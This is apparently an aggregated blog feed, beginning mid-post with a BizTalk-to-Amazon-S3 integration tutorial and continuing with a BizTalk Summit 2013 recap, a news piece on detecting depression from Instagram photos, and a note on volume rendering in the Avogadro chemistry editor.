    msgS3Request(WCF.SecurityMode)="None";
    msgS3Request(WCF.HttpMethodAndUrl) = "PUT";  //Writing to Amazon S3 requires a PUT
    msgS3Request(WCF.OpenTimeout)= "00:10:00";
    msgS3Request(WCF.CloseTimeout)= "00:10:00";
    msgS3Request(WCF.SendTimeout)= "00:10:00";
    msgS3Request(WCF.MaxReceivedMessageSize)= 2147483647;

    Lastly we need to set the URI that we want to send our message to and also specify that we want to use the WCF-WebHttp adapter.

    Port_SendToS3(Microsoft.XLANGs.BaseTypes.Address)="http://<bucketname>.s3-us-west-2.amazonaws.com/310531500150800.PDF";
    Port_SendToS3(Microsoft.XLANGs.BaseTypes.TransportType)="WCF-WebHttp";

    Note: the last part of my URI 310531500150800.PDF represents my Resource.  In this case I have hardcoded a file name.  This is obviously something that you want to make dynamic, perhaps using the FILE.ReceivedFileName context property.

  4. Once we have assembled our S3 message, we will go ahead and send it through our Dynamic Solicit-Response Port. The message that we are going to send to Amazon and receive back is once again of type System.Xml.XmlDocument.
  5. One thing to note is that the response you receive back from Amazon won't actually have a message body (this is in line with REST). However, even though we receive an empty message body, we will still find some valuable Context Properties. The two properties of interest are:

    InboundHttpStatusCode

    InboundHttpStatusDescription

    image

     

  6. The last step in the process is to just write our Amazon response to disk. As we learned in the previous point, the message body will be empty, but it still gives me an indicator that the process is working (in a Proof of Concept environment).

Overall the Orchestration is very simple.  The complexity really exists in the Message Assignment shape. 

image

 Testing

Not that watching files move is super exciting, but I have created a quick Vine video that will demonstrate the message being consumed by the FILE Adapter and then sent off to Amazon S3.

 https://vine.co/v/hQ2WpxgLXhJ

Conclusion

This was a pretty fun and frustrating solution to put together.  The area that caused me the most grief was easily the Authorization Header.  There is some documentation out there related to Amazon “PUT”s but each call is different depending upon what type of data you are sending and the related headers.  For each header that you add, you really need to include the related value in your “canonicalString”.  You also need to include the complete path to your resource (/bucketname/resource) in this string even though the convention is a little different in the URI.

Also it is worth mentioning that /n Software has created a third party S3 Adapter that abstracts some of the complexity  in this solution.  While I have not used this particular /n Software Adapter, I have used others and have been happy with the experience. Michael Stephenson has blogged about his experiences with this adapter here.


          BizTalk Summit 2013 Wrap-up        

On November 21st and 22nd I had the opportunity to spend a couple days at the 2nd annual BizTalk Summit held by Microsoft in Seattle.  At this summit there were approximately 300 Product Group members, MVPs, Partners and Customers.  It was great to see a lot of familiar faces from the BizTalk community and talk shop with people who live and breathe integration.

Windows Azure BizTalk Services reaches GA

The Summit started off with a bang when Scott Gu announced that Windows Azure BizTalk Services has reached General Availability (GA)!!!   What this means is that you can receive production level support from Microsoft with 99.9% uptime SLA. 

 

image

During the preview period, Microsoft was offering a 50% discount on Windows Azure BizTalk Services (WABS).  This preview pricing ends at the end of the year.  So if you have any Proof of Concept (POC) apps running in the cloud that you aren’t actively using, please be aware of any potential billing implications.

Release Cadence

The next exciting piece of news coming from Microsoft is the release cadence update for the BizTalk Server product line.  As you have likely realized, there is usually a BizTalk release shortly after the General Availability of platform updates.  So when a new version of Windows Server, SQL Server or Visual Studio is launched, a BizTalk Server release usually closely follows.  Something that is changing within the software industry is the accelerated release cadence of Microsoft and its competitors.  A recent example of this accelerated release cadence is Windows 8.1, Windows Server 2012 R2 and Visual Studio 2013.  These releases occurred much sooner than they have in the past.  As a result of these new accelerated timelines the BizTalk Product Group has stepped up, committing to a BizTalk release every year!  These releases will alternate between R2 releases and major releases.  For 2014, we can expect a BizTalk 2013 R2 and in 2015 we can expect a full release.

BizTalk Server 2013 R2

So what can we expect in the upcoming release?

  • Platform alignment (Windows, SQL Server, Visual Studio) and industry specification updates (SWIFT).
  • Adapter enhancements including support for JSON (Yay!), proxy support for SFTP and authorization enhancements for Windows Azure Service Bus.  A request I do have for the product team is to please include support for Windows Server Service Bus as well.
  • Healthcare Accelerator improvements.  What was interesting is that this is the fastest growing vertical for BizTalk Server, which justifies the additional investments.

image

 

Hybrid Cloud Burst

There were a lot of good sessions but one that I found extremely interesting was the session put on by Manufacturing, Supply Chain, and Information Services (MSCIS).  This group builds solutions for the Manufacturing and Supply Chain business units within Microsoft. You may have heard of a “little” franchise in Microsoft called XBOX.  The XBOX franchise heavily relies upon Manufacturing and Supply chain processes and therefore MSCIS needs to provide solutions that address the business needs of these units.  As you are probably aware, Microsoft has recently launched XBOX One which is sold out pretty much everywhere.  As you can imagine building solutions to address the demands of a product such as XBOX would be pretty challenging.  Probably the biggest hurdle would be building a solution that supports the scale needed to satisfy the messaging requirements that many large Retailers, Manufacturers and online customers introduce.

In a traditional IT setting you throw more servers at the problem.  The issue with this is that it is horribly inefficient.  You essentially are building for the worst case (or most profitable) but when things slow down you have spent a lot of money and you have poor utilization of your resources.  This leads to a high total cost of ownership (TCO). 

Another challenge in this solution is that an ERP is involved in the overall solution.  In this case it is SAP (but this would apply to any ERP), and you cannot expect an ERP to provide the performance to support ‘cloud scale’.  At least not in a cost-competitive way. If you have built a system in an asynchronous manner you can throttle your messaging and therefore not overwhelm your ERP system.

MSCIS has addressed both of these major concerns by building out a Hybrid solution. By leveraging Windows Azure BizTalk Services and Windows Azure Service Bus Queues/Topics in the cloud they can address the elasticity requirements that a high demand product like XBOX One creates. As demand increases, additional BizTalk Services Units can be deployed so that Manufacturers, Retailers and Customers are receiving proper messaging acknowledgements.  Then On-Premise you can keep your traditional capacity for tools and applications like BizTalk Server 2013 and SAP without introducing significant infrastructure that will not be fully utilized all the time.

Our good friend Mandi Ohlinger, who is a technical writer with the BizTalk team, worked with MSCIS to document the solution.  You can read more about the solution on the BizTalk Dev Center.  I have included a pic of the high-level architecture below.

image

While Microsoft is a large software company (ok, a Devices and Services company), what we often lose sight of is that Microsoft is a very large company (more than 100,000 employees) and they have enterprise problems just like any other company does.  It was great to see how Microsoft uses their own software to address real world needs.  Sharing these types of experiences is something that I would really like to see more of.

Symmetry

(These are my own thoughts and do not necessarily reflect Microsoft’s exact roadmap)

If you have evaluated Windows Azure BizTalk Services you have likely realized that there is not currently symmetry between BizTalk Services and BizTalk Server.  BizTalk Server has had around 14 years (or more) of investment, whereas BizTalk Services, in comparison, is relatively new.  Within Services we are still without core EAI capabilities like Business Process Management (BPM)/Orchestration/Workflow, Business Activity Monitoring (BAM), the Business Rules Engine (BRE), a comprehensive set of adapters and a complete management solution.

With BizTalk Server we have a mature, stable, robust integration platform.  The current problem with this is that it was built well before people started thinking about cloud scale.  Characteristics such as MSDTC and even the MessageBox have contributed to BizTalk being what it is today (a good platform), but they do not necessarily lend themselves to new cloud based platforms.  If you look under the hood in BizTalk Services you will find neither of these technologies in place.  I don’t necessarily see this as a bad thing.

A goal of most, if not all, products that Microsoft is putting in the cloud is symmetry between on-premises and cloud based offerings.  This puts the BizTalk team in a tough position.  Do they try to take a traditional architecture like BizTalk Server and push it into the cloud, or build an architecture on technologies that better lend themselves to the cloud and then push it back on-premises? The approach, going forward, is innovating in the cloud and then bringing those investments back on-premises in the future.

Every business has a budget and priorities have to be set.  I think Microsoft is doing the right thing by investing in the future instead of making a lot of investments in the On-Premise offering that we know will be replaced by the next evolution of BizTalk.  There were many discussions between the MVPs during this week in Seattle on this subject with mixed support across both approaches. With the explosion of Cloud and SaaS applications we need an integration platform that promotes greater agility, reduces complexity and addresses scale in a very efficient manner instead of fixing some of the deficiencies that exist in the current Server platform. I do think the strategy is sound, however it will not be trivial to execute and will likely take a few years as well.

Adapter Eco-system

Based upon some of the sessions at the BizTalk Summit, it looks like Microsoft will be looking to create a larger ISV eco-system around BizTalk Services, more specifically in the adapter space.  The reality is that the current adapter footprint in BizTalk Services is lacking compared to some other competing offerings.  One way to address this gap is to leverage trusted 3rd parties to build their adapters and make them available through some sort of marketplace. I think this is a great idea provided there is some sort of rigor applied to the process of submitting adapters.  I would not be entirely comfortable running mission critical processes on an adapter that was built as a hobby project.  However, I would not have an issue purchasing an adapter in this fashion from established BizTalk ISV partners like BizTalk360 or /n Software.

Conclusion

All in all it was a good summit.  It was encouraging to see the BizTalk team take BizTalk Services across the goal line and make it GA.  It was also great to see that they have identified the need for an accelerated release cadence and shared some news about the upcoming R2 release.  Lastly, it was great to connect with so many familiar faces within the BizTalk community.  The BizTalk community is not huge, but it is definitely international, so it was great to chat with people you are used to interacting with over Twitter, blogs or LinkedIn.

In the event you still have doubts about the future of BizTalk, rest assured the platform is alive and well!


          Your Instagram Photos May Reveal Whether Or Not You Have Depression        

A picture may be worth a thousand words, as the saying goes, but it could also be worth a life-saving diagnosis. Your social media photos may reveal clues to the state of your mental health, according to a new study.

In a small study of 166 people, researchers examined more than 43,000 Instagram pictures from their subjects’ profiles. Researchers also asked questions about each participant’s mental health history. A little less than half of the participants had been diagnosed with depression within the past three years.

The researchers then developed an algorithm that analyzed elements of the Instagram photos, including components like colors, the number of people in a picture and the number of comments and likes the photo received. Those who had depression typically posted images that contained bluer, darker hues and had fewer faces in the images.

Participants with depression were also more likely not to use filters when they were editing and uploading a photo. When they did opt for an enhancement, they “disproportionately favored the ‘Inkwell’ filter, which converts color photographs to black-and-white images,” the authors wrote. Healthy participants tended to favor the “Valencia” filter, which makes the tint more vibrant.

The difference between photo filters healthy participants used in the study and what people with depression typically chose.

Ultimately, using their observations about photo selection and filtering, the researchers created an algorithm that accurately determined if the user had depression 70 percent of the time. The computer program even picked up on signs of depression in a person’s photos that were posted before they were officially diagnosed.

The study is what’s known as “proof of concept,” which essentially means testing to see if a theory has a real-world application, so it shouldn’t be taken as gospel quite yet. For starters, the sample size was small and the volunteers had certain qualities in common: They were willing to submit surveys on their mental health and were relatively active on social media. All of this makes it difficult to know if the study’s outcomes can be applied to an average Instagram user, according to study author Chris Danforth, co-director at the University of Vermont’s Computational Story Lab.

The researchers do hope that the results help encourage scientists to conduct more research on the intersection of technology and depression signs, which could possibly lead to better early detection for mental illness in the future.

“It shows some promise to the idea that you might be able to build a tool like this to get individuals help sooner,” Danforth told HuffPost, adding that the program could have some utility for doctors when it comes to diagnosing patients who may only come in once every few years for a checkup.

The results of the study also align with what mental health professionals have observed in the past, Danforth said. Those with depression tend to withdraw from social groups, so it makes sense that those participants in the study had fewer people in their photos. Their worldview is often darker, he added, which could explain the photo filters they tend to choose.

Nearly 300 million people worldwide are affected by depression. Ideally, Danforth says the best outcome of technology like this is getting those individuals the medical support that they need. Especially when they may be unaware about what’s going on or hesitant to reach out on their own.

“The end goal of this would be creating something that monitors a person’s voice, how they’re moving around and what their social network looks like ― all the stuff we already reveal to our phones,” Danforth said. “Then that could give doctors a ping to check in or at least some insight. Because maybe there’s something going on that even the individual doesn’t recognize about their behavior.”

Increasingly, researchers are mining social media as a data-rich resource about how people live. Back in 2013, researchers at the University of Vermont released a comprehensive report on the happiest and least happy states based on geotagged tweets.

Social media isn’t going anywhere, so incorporating it into important health research is a win for everyone. The study was published in the journal EPJ Data Science.


          Join us for “Real World Deployments for Industrial Applications” Webinar        
There has been a lot of discussion lately around why IoT projects fail. Many projects stall at the proof of concept (POC) phase, and only about a quarter of these investments are considered a success.  With these setbacks however, there are some notable achievements as well. As part of our factory of the future webinar […]
          DH2i Unveils New Sandbox Lab for the Rapid Proof of Concept (POC) Testing of Container Management Software for Microsoft Windows Applications        
New POC Lab Demonstrates How Enterprises Can Go from Standalone to High Availability (HA) Failover Clusters in Just a Few Minutes.
          How to Automate Processing of Azure Analysis Services Models        
I’ve been working on a proof of concept for a customer that involved using Azure Analysis Services as a cache for some data in an Azure Data Warehouse instance. One of the things I’ve been working ...
          141: Managing People as a Fast Growth Startup with Katelyn Gleason of Eligible.com        

At 23, Katelyn Gleason faced, like many people in their early 20s, an existential crisis. She just didn't know what she wanted to do.

"I started thinking about jobs. I was like 'God if I'm going to have to do this for the rest of my life it better be something I really care about, that can be my life's work, that I can really invest all of my time and all my energy into,'" Gleason says.

Her first step was to start reading the biographies of some of the greatest individuals in human history—Marie Curie, Jane Austen, Abraham Lincoln, anything she could get her hands on. Gleason's goal was to learn as much as she could about these great people and how they managed to leave such a large legacy and imprint on humankind today.

It wasn't long before Gleason found herself immersed in the world of healthcare, technology, and startups. It was there she found her purpose. Gleason noticed a problem in the medical industry that no one seemed to be talking about or trying to solve. Doctors and patients alike were getting bogged down with paperwork that was often confusing, and as a result, many were dealing with huge costs simply by filling out the wrong forms.

The next nine months were spent at her kitchen table, furiously working on a solution to this problem. That solution would end up becoming Eligible, a medical billing startup designed to make it as simple as possible for doctors and insurance companies to work together and save everyone money: patients, doctors, and insurance companies alike.

As a two-time alumna of Y Combinator, Gleason led Eligible from quietly testing and validating its product to becoming an explosive fast-growth company. Today, Eligible processes 14 million transactions per month, with a projected 50 million transactions by the end of the year, and has raised more than $25 million in funding.

In this week's episode you will learn:

  • Every step you need to take as the founder of a startup, from validating to raising capital
  • How to gain proof of concept as quickly as possible
  • Where to find co-founders to complement your own skills and talents
  • What strategies you can use to build a fast-growth company
  • How to manage the people around you and keep them focused on your goal
  • & much more!

          MultiTech’s Conduit™ LoRa Starter™ Kit Speeds Deployment for LoRa® Technology        

Enables Quick Connections from LoRa Proof of Concept to the Cloud

(PRWeb July 19, 2016)

Read the full story at http://www.prweb.com/releases/2016/07/prweb13561827.htm


          Tracking air quality from high in the sky        
October 21, 2015 | NCAR scientists have demonstrated how new types of satellite data could improve how agencies monitor and forecast air quality, both globally and by region. The scientists used computer simulations to test a method that combines analysis of chemistry-climate model output with the kind of data that could be obtained from a planned fleet of geostationary satellites, each of which would view a large area of Earth on a continuous basis from high orbit. For example, with a constellation of satellites, the system could be used to measure, track, and predict the effects of pollution emitted in Asia and transported to the western U.S., or the impacts of wildfires in the Pacific Northwest on air quality in the Midwest.

A high-orbit geostationary satellite could view a large area of the Earth, such as North America in this illustration, on a continuous basis. (Image courtesy NASA/Langley Research Center)

"We think the new perspective made possible by geostationary sensors would provide data that is useful for everyday air quality forecasting, as well as for early warnings about extreme events, like the effects of wildfires," said NCAR scientist Helen Worden, one of the members of the research team. The NCAR team reported their test of the system's potential in a paper co-authored with a NASA scientist that appears in the journal Atmospheric Environment.

Current observations are mostly taken from low-elevation, globally orbiting satellites that provide only one or two measurements over a given location per day, thus limiting critical air quality observations, such as vehicle emissions during rush hour. One exception is an air quality forecasting system at the National Oceanic and Atmospheric Administration that uses geostationary sensors to provide information about tiny polluting particles known as aerosols. But that system doesn't track carbon monoxide, a primary indicator of air pollution that serves as a good chemical tracer for observing how pollutants are emitted and dispersed in the atmosphere. "Carbon monoxide lives long enough—a month or two—that you can track it around the Earth," Worden said.

To fill in the data gap, several countries and space agencies plan to deploy geostationary satellites by the end of the decade to observe and monitor air pollutants over North America, Europe, and East Asia.

Proof of concept

The team members applied a statistical technique that they and colleagues have developed over the years to analyze data obtained by an instrument aboard NASA's globally orbiting Terra spacecraft called MOPITT (Measurement of Pollution in the Troposphere). A collaboration between the University of Toronto and NCAR, MOPITT pioneered the measurement of carbon monoxide from space. Starting with MOPITT's real-world observations, the scientists then produced a data set of hypothetical observations representative of those potentially obtainable from a constellation of geostationary satellites. They visualized their results on high-resolution maps, producing results for areas as small as 2.7 miles (7 kilometers) wide that extend as high as 7.5 miles (12 kilometers) into the atmosphere.

Measurements of carbon monoxide in April 2014 from the MOPITT instrument (Measurement of Pollution in the Troposphere) aboard NASA's globally orbiting Terra spacecraft. The boxes show the observing domains for geostationary satellites and red colors indicate high levels of carbon monoxide. (©UCAR. Image courtesy Helen Worden, NCAR. This image is freely available for media & nonprofit use.)

When it comes to speed and cost, the NCAR method has several advantages. A month's worth of data, about 200 million data points, can be produced in less than 12 hours using a standard desktop computer. "The model produced very realistic results on high-resolution maps at a low computational cost," said NCAR scientist Jerome Barre, who led the study. The scientists caution that there are limitations to the new system when viewing extremely polluted areas. The team accounted for the impact of clouds in their model to simulate the most realistic measurements.

Next steps

A geostationary satellite positioned at about 22,000 miles above the equator will orbit in sync with the Earth’s rotation, thus remaining fixed above the same region. Measurements by the satellite's instruments can be taken many times a day. A constellation of such satellites would provide the coverage over populated regions needed to provide enough data to analyze air quality and atmospheric composition, determine whether the pollution is human-made or natural, and track its movement. In addition to carbon monoxide, instruments on these satellites would gather data on other pollutants, such as nitrogen dioxide and ozone. "Combined, those will give you good indications of the chemical conditions of the atmosphere," Barre said. That would enable scientists to track pollutants both vertically and horizontally in our atmosphere, he said, and that is "what's really needed to monitor, forecast, and manage air quality on a daily basis."

About the article

Jerome Barre, David P. Edwards, Helen M. Worden, Arlindo Da Silva, and William Lahoz, 2015: On the feasibility of monitoring carbon monoxide in the lower troposphere from a constellation of Northern Hemisphere geostationary satellites (Part 1). Atmospheric Environment, 113, 63-77, doi:10.1016/j.atmosenv.2015.04.069

Writer/Contact: Jeff Smith, Science Writer and Public Information Officer

Collaborating organizations: NASA, Norwegian Institute for Air Research

Funders: National Science Foundation, NASA

          Eclipse GUI Test Automation: American Power Conversion Corp. uses Squish for Java        
The team searched for a suitable tool, and during that process they downloaded an evaluation copy of Squish. They used the evaluation copy to produce a proof of concept, and having successfully done this, they then contacted several companies who were already using Squish for their test efforts. After completing their research and satisfying themselves that Squish would meet their needs, they purchased their Squish licenses.
From a technical point of view, several reasons led to APC choosing Squish for automating InfraStruXure's functional GUI tests, rather than some other tool. One key reason was Squish's cross-platform support, which means that the same test scripts can be run against their user interface on both Windows and Linux.
          Endless scrolling based on a simple HTML pager        
keejoz: "Nothing at all happens for me? I don't really get it." In the demo I have set the number of items per page to 12 instead of 6; that will probably make sure everyone gets a scrollbar. It is, by the way, still just a proof of concept.
Precision: "It could be a hype and they might want to jump on it at work; nice that they also get to use buzzwords." That is quite a phenomenal way of taking something out of context. Telling that this is a blog post about implementation, as opposed to interaction design, which everyone apparently does have an opinion on. Completely misplaced, if you ask me.
          Endless scrolling based on a simple HTML pager        
Endless scrolling is a nice concept, but I just can't seem to get used to the unusable scrollbar. Normally it gives a good idea of the size of the page and your position on it. Combined with regular paging, I'm able to get a good idea of the length of the total content and my progress through it. Without this I start to feel sort of lost on a page. So for me it feels like endless scrolling is a usability-degrading form of lazy loading. I did like the presentation and implementation of your proof of concept!
          Also, a little close up!        
Also, a little close up of a proof of concept experiment on today's project. Turns out, it's possible to braid around solid objects like this little ring. I'm not sure yet where this would be useful, but it's good to know that it's possible!

          An [for the web] old classic – no-click interface proof of concept        
http://www.dontclick.it/

Posted in design, flash, human-machine interface
          Fracture and hydraulic fracture initiation, propagation and coalescence in shale        
Fracture and hydraulic fracture initiation, propagation and coalescence in shale
AlDajani, Omar AbdulFattah

Even though hydraulic fracturing has been in use for more than six decades to extract oil and natural gas, the fundamental mechanism to initiate and propagate these fractures remains unclear. Moreover, it is unknown how the propagating fracture interacts with other fractures in the Earth. The objective of this research is to gain a fundamental understanding of the hydraulic fracturing process in shales through controlled laboratory experiments where the underlying mechanisms behind the fracture initiation, propagation, and coalescence are visually captured and analyzed. Once these fundamental processes are properly understood, methods that allow one to produce desired fracture geometries can be developed.

Two different shales were investigated: the organic-rich Vaca Muerta shale from the Neuquén Basin, Argentina and the clay-rich Opalinus shale from Mont Terri, Switzerland, which were shown to vary in mineralogy and mechanical properties. Specimen preparation techniques were developed to successfully dry cut a variety of shales and produce prismatic specimens with pre-existing artificial fractures (flaws). The Vaca Muerta shale specimens were subjected to a uniaxial load which induces fractures emanating from the flaws. Two geometries were tested: a coplanar flaw geometry (2a-30-0) resulting in indirect coalescence and a stepped flaw geometry (2a-30-30) resulting in direct coalescence. These "dry" fracture experiments were analyzed in detail and corresponded well to the behavior observed in the Opalinus shale. This result shows that the fracture behavior in Opalinus shale can be extended to other shales.

A test setup capable of pressurizing an individual flaw in prismatic shale specimens subjected to a constant uniaxial load and producing hydraulic fractures was developed. This setup also allows one to monitor internal flaw pressure throughout the pressurization process, as well as visually capture the processes that occur when the shale is hydraulically fractured. Three fracture geometries in Opalinus shale were tested using this developed setup: single vertical flaw (SF-90) for the proof of concept of the test setup, stepped flaw geometry (2a-30-30) which resulted in no coalescence, and stepped flaw geometry (2a-30-60) which resulted in indirect coalescence. Of particular interest were the observed lag between the crack tip and the liquid front as well as the way the hydraulic fracture propagates across and along bedding planes. A systematic difference was observed when comparing crack interaction behavior for "dry" and hydraulic fracture experiments for various flaw geometries. The result of this thesis will add to fundamental knowledge of how fractures behave and interact under various loading conditions, flaw geometries, and materials, serving as a basis for predictive fracture models.

Thesis: S.M., Massachusetts Institute of Technology, Department of Civil and Environmental Engineering, 2017. Cataloged from PDF version of thesis. Includes bibliographical references (pages 152-154).
          Fresh From a Stream        

At tonight's San Fernando Valley LUG meeting, our friend Larry was at it again, trying to access media streams from http://www.freetv.com from the text console, preferably from the Lynx browser. After a lot of floundering around, we managed to play a few of the URLs given in descriptive text (not expressed in HTML links) with mplayer.

After arriving home, here are some things I found to explore the site with.

Install Privoxy, and add the following to your /etc/privoxy/user.action file (or perhaps to /etc/privoxy/standard.action if the release of Privoxy you are using doesn't have the user.action file):


{ +filter{freetv} }
.freetv.com

Then add the following to /etc/privoxy/user.filter (or /etc/privoxy/standard.filter if your Privoxy doesn't use a user.filter):


#################################################################################
#
# freetv: Try to convert certain URLs floating in space to actual links
#               05/31/2008 d.e.l.
#
#################################################################################
FILTER: freetv Try to convert certain URLs to automatically launch links

s| (mmst?://[^ <>]*) |<A href="$1">$1</A>|igsx


Restart privoxy, typically with

sudo /etc/init.d/privoxy restart

Then install this script, which I called mmsStreamer, somewhere in a directory in your PATH:


#!/bin/bash
# Play an mms:// (or mmst://) stream URL handed over by Lynx.

URL="${1}"

# Extract the host name from the URL: strip the scheme, then any path/query.
TURL=${URL#*://}
TURL=${TURL%%[/?]*}
echo "Domain: ${TURL}"

# Quick sanity check that the host resolves and answers at all.
ping -qc 3 "${TURL}"
DOMAIN_TEST_RESULT=$?

if [ ${DOMAIN_TEST_RESULT} -ne 0 ]
then
  echo "The domain ${TURL} seems bogus.  Hit return to continue."
  read BOGUS
  exit 1
fi

# Try the URL first as a plain stream, then as a playlist;
# whichever form matches the stream will actually play.
sudo mplayer -vf-clr "${URL}"

sudo mplayer -vf-clr -playlist "${URL}"

exit 0

You may need to modify the lines with mplayer to match how you normally invoke mplayer; just make sure one invocation has the -playlist parameter so that one or the other will run. And of course, make sure to adjust permissions with chmod ugo+x mmsStreamer. There are probably many improvements that can be made to this script, but it is partly a proof of concept script, partly something to get rolling with some quick results.

Then, in your lynx.cfg file, add the following to the EXTERNAL section:

EXTERNAL:mms:mmsStreamer %s:TRUE:TRUE

The last 'TRUE' will cause mmsStreamer to be run automatically when you activate a link with type mms.

Now, the next time you go to http://www.freetv.com, you should be able to play some of the mms stream URLs, which will now be actual links. Some of them seemed to be mere ads, others seemed to have bona fide content. A few might be missed; I noticed one with the typo of two colons (mms:://), and a Google search of the site turned up a couple of http streams. These seem to be the exceptions that will still have to be handled by hand. A lot seemed to be no longer there, but perhaps a better choice of mplayer switches and settings might tap into them.
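
If you wanted to catch that double-colon typo automatically as well, an extra (untested) pcrs job added under the same FILTER: freetv section ought to do it; the capture simply reinserts a single colon when rebuilding the link:

# Hypothetical extra rule: turn the mms:: typo into a working mms: link
s| mms::(//[^ <>]*) |<A href="mms:$1">mms:$1</A>|igsx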

    A few things turned up browsing the site.
  • One is that I was reminded of the http://www.la36.org site, with a lot of Los Angeles local content. I didn't have the time to investigate if it is being updated, but I did notice a few videos of past L.A. Public Library / Library Foundation ALoud talks. A few of these are of technical interest, such as Craig "List" Newmark, and one on the Google Book project.
  • I probably should add some capability to deal with http://www.la36.org to usnatch
  • I was spurred to search Wikipedia for http://www.freetv.com and it turned up http://en.wikipedia.org/wiki/Public_access_stations_%28United_States%29. Perhaps some creative search will turn up a few other pages to explore.
  • http://www.drgenescott.com didn't seem to be active, but it did remind me of the many times I'd passed him on the TV dial in days past, and the many discussions of this archetypal L.A. CA personality.

          Facilitating at the Leadership Summit        
Drawing by Hilda Anggraeni

Earlier this month BCcampus hosted a one-day Learning, Teaching and Ed Tech Leadership Summit. The purpose of the summit and subsequent steps was to bring together provincial leaders to collaborate, innovate and solve problems. The day was organized as a participatory and emergent process to:
  • identify issues and challenges
  • begin to think about solutions
  • discuss how we will work together as a consortium
  • begin planning our first open event
  • discuss how decisions are currently being made with respect to Ed tech choices and implementation
  • gain feedback on a proposal for a new provincial teaching with technology award
The Challenges and Solutions participatory graphic wall anchored the discussions throughout the day. Ultimately we wanted to situate ourselves in the landscape of working as a collective -- system wide.

My facilitation role was around the "how we will work together" piece. Here are my prep and process notes, along with some reflections on how it all went.

Collaborating as a consortium

Key questions guiding this activity:
  • What are the results/outcomes we want?
  • What do you want from each other? 
  • From BCcampus? 
  • How do you envision the group working? 
  • Who will lead? 
In this visioning session, I used the Purpose to Practice Liberating Structure (P2P). The focus is on what we can do as a collective, so P2P seemed like an ideal choice. We worked together to define what our collective goals might be, and the essential elements of our future collaborative work: purpose, principles, participants, structure, and practices (and more photographs of the output)

I created a large, colourful poster for each group of the 5 groups, along with discussion questions on index cards for prompts.

Here are my personal and rough notes to guide my own facilitation. I like to use Evernote on my iPad for that -- it fits with my habits of updating the outline at the last minute, inserting notes as I listen to conversations leading up to the session.

11:10 set up
  • Clearly have a lot to work on
  • Many great discussions, creative solutions.
  • How can we work together
  • We already have a good start on getting our heads into this
  • Just first steps in thinking about this.
  • Next 50 minutes generating ideas about how to accomplish what we want to do
  • This is going to be rapid and definitely unfinished
  • Sharpen later
  • Liberating structures - a variation on purpose to practice
  • 5 elements - lots of overlap
  • You can choose to think out one project as proof of concept, but don't get too hung up on details. We're talking about many projects and potentially many years
  • Work through one together - purpose - then in 4 groups

11:20 Purpose
  • Guiding questions. Read them
  • Individual
  • Table
  • Report out one statement from each table
  • One person write on flip chart
11:35 Elements
  • Short description of each group
  • Guiding question / add your own questions on cards
  • Feel free to move around to other tables to see their questions
  • Jot down your ideas and thoughts on post it notes
  • Individual
  • Table
  • Capture capture capture on post it notes
  • Start: one person from each table pick up your element package
11:50
  • Take what's on the table and display it over lunch
  • Encourage you to visit each element and zone in on some of the details
  • Promise to capture and report back
  • Promise to organize next steps

Purpose

Leadership Summit 2014

We worked through the Purpose activity together (individual, each table, report back). Key questions:
  • Why is this work important to you? 
  • What is our core reason for working together? 
  • Why is this work important to the larger community

Principles

Leadership Summit 2014

Key questions:
  • To fail, what must we do? 
  • To succeed, what must we do? 
  • What are the things we don't want to repeat? 
  • What is one BIG thing on the "must do" list? 
  • What is one small thing on the "must do" list?

Participants


Leadership Summit 2014

Key questions:

  • Who should be included?
  • Who will move things forward at your institution?
  • Who can contribute?
  • Where do you see yourselves (as a group) in terms of your participation?
  • At the end of the day, where will you pin your name on the landscape?
  • What is the role of BCcampus?

Structure

Leadership Summit 2014

Key questions:

  • How is work distributed?
  • How do we organize ourselves?
  • What important conversations do you need to have to make things happen?
  • What do we need to support our work?
  • How is control distributed?
  • Where do YOU fit in? 

Practices

Leadership Summit 2014

Key questions:

  • What are our milestones?
  • What will stand in our way?
  • What will we do and how?
  • What are the outcomes of our work together?
  • What will have changed one month from now?
  • What will have changed one year from now?

How did it go?

There were some excellent discussions! It seemed well paced, and the invitation to transfer and arrange the notes over lunch was well received (that's always a risky request!). This Liberating Structure activity tied in well to the rest of the day as we moved forward to discuss personal commitment and next steps. 

As with any implementation of a new facilitation structure, it took careful planning -- it seems so easy on paper, but in the moment you realize the importance of clear explanations of the process. If you send everybody off into groups without a solid understanding of tasks, as well as the purpose of those tasks, it can get a bit chaotic. Making the table rounds helped to clarify any confusion. 

I've never been able to follow "recipes" completely. I always invent variations, which isn't such a bad thing, but there is something to be said for following the design as written. Ha! I might try that next time. 


          Security: update iOS to protect yourself from Trident and Pegasus        

The good part of the news is that Apple has already released an update to fix the vulnerability.
The bad part is that the vulnerability was there, and a serious one at that, at least according to what Citizen Lab and Lookout reported in the last few hours after discovering an active threat that exploited three critical zero-day vulnerabilities in iOS.
"Trident" is the name the experts have given to this set of vulnerabilities; they say they worked closely with Apple, which indeed immediately released its 9.3.5 patch, with the recommendation to update your systems right away.

What Trident and Pegasus are

Trident, the experts explain, is used in a piece of spyware called Pegasus, developed by NSO Group, an organization based in Israel and known for its activities in cyber warfare, zero-day attacks, obfuscation, and kernel-level malware. Pegasus can open an encrypted communication channel between the targeted user and a remote server, and can access messages, calls, emails, log data and other information from apps such as Gmail, Facebook, Skype, WhatsApp, Viber, FaceTime and more.
Not only that: once it has installed itself on the device, this malware is not removed either by resetting the device or by updating it.
So we are not talking about a proof of concept, but about active malware that exploits vulnerabilities that have been present for some time and that has been used to directly attack politicians, public figures, activists and journalists.

The attack on Ahmed Mansoor

The discovery of Trident is due to the actions of Ahmed Mansoor, an activist known for speaking out against the repressive practices of some Middle Eastern governments, who received a message inviting him to consult a dossier on torture taking place in the prisons of the United Arab Emirates.
Mansoor, who has long said he is a target of malware attacks, did not click on the link offered to him, which would in effect have given others access to and control of his iPhone, but instead forwarded the message to Citizen Lab, which then carried out the investigation together with Lookout's engineers.

The article "Security: update iOS to protect yourself from Trident and Pegasus" is original content from 01net.


          Volume Rendering in Avogadro        

Since joining Kitware I have had limited spare time to work on Avogadro, and for various reasons my spare time has been more limited than usual too. Since the new year I have been able to start spending more time working on Avogadro, and open source chemistry in general, thanks to an SBIR phase I proposal that was funded last year with the US Army Corps of Engineers. This is exciting for a number of reasons, including the fact that I have the opportunity to prototype exciting new features for chemistry visualization, workflow and data management.

One of the new bits of work I have been doing is to use some of the advanced visualization techniques in VTK such as GPU accelerated volume rendering. Now the code is still pretty rough, and is more a proof of concept. I wrote a simple external Avogadro extension that links to and uses VTK to render the first volume found in the current Avogadro molecule. All of the parameters are currently fixed, I am hoping to get the time to add in more options along with some integration of the Avogadro rendered molecule in the VTK render window. You can view the code here, please bear in mind it is at a very early stage.
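
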